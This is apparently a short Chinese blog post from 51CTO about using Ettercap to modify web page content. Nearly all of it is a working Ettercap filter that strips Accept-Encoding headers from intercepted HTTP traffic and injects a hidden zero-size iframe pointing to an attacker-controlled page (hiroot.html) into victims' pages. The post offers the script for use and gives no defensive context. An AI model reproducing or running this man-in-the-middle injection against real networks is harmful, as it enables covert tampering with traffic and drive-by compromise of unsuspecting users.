if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) { #...and if it contains an Accept-Encoding header... if (search(DATA.data, "Accept-Encoding")) { #...remove any Encoding (make sure we are using plain text) replace("Accept-Encoding", "Accept-Nothing!"); } } #--Inject Iframe-- if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.src == 80 || tcp.src == 8080) { if (search(DATA.data, "<body>")){ #Replace it with the body tag and an iframe to our attacking webpage replace("<body>","<body><iframe src='http://192.168.1.2/hiroot.html' width=0 height=0 />"); msg("iframe injected after <body>\n"); } if (search(DATA.data, "<BODY>")){ replace("<BODY>","<BODY><IFRAME SRC='http://192.168.1.2/hiroot.html' width=0 height=0 />"); msg("iframe injected after <BODY>\n"); } }
ettercap 修改页面内容
原创
©著作权归作者所有:来自51CTO博客作者y0umer1的原创作品,请联系作者获取转载授权,否则将追究法律责任
下一篇:一个drop table用的时间
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
Ettercap and sslstrip职场 休闲 Ettercap
-
更改nginx网站根目录
更改nginx网站根目录
网站 include nginx local 根目录